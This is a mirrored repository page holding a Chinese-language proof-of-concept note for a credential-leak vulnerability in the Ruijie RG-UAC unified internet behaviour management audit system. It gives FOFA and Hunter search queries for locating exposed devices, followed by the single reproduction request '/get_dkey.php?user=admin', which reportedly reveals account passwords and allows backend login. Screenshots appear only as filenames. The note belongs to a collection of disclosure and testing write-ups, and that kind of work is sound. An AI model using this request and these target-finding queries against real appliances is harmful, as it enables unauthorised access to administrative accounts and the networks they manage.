admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 19:35:52 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/锐捷/锐捷RG-UAC应用网关/锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1008 B
Raw Blame History

锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞

一、漏洞简介

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 。

二、影响版本

  • 锐捷RG-UAC统一上网行为管理审计系统

三、资产测绘

  • hunterapp.name="Ruijie 锐捷 RG-UAC"
  • fofoa:app="Ruijie-RG-UAC"

登录页

1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png

四、漏洞复现

/get_dkey.php?user=admin

1711942654983-81767f2d-af9a-4c55-a6bf-54ccc7d257aa.png

1711942773077-d328619f-9fe1-49f8-88bb-da5a39b5859e.png

更新: 2024-06-24 11:42:28
原文: https://www.yuque.com/xiaokp7/ocvun2/vfv3tndznm6x0igq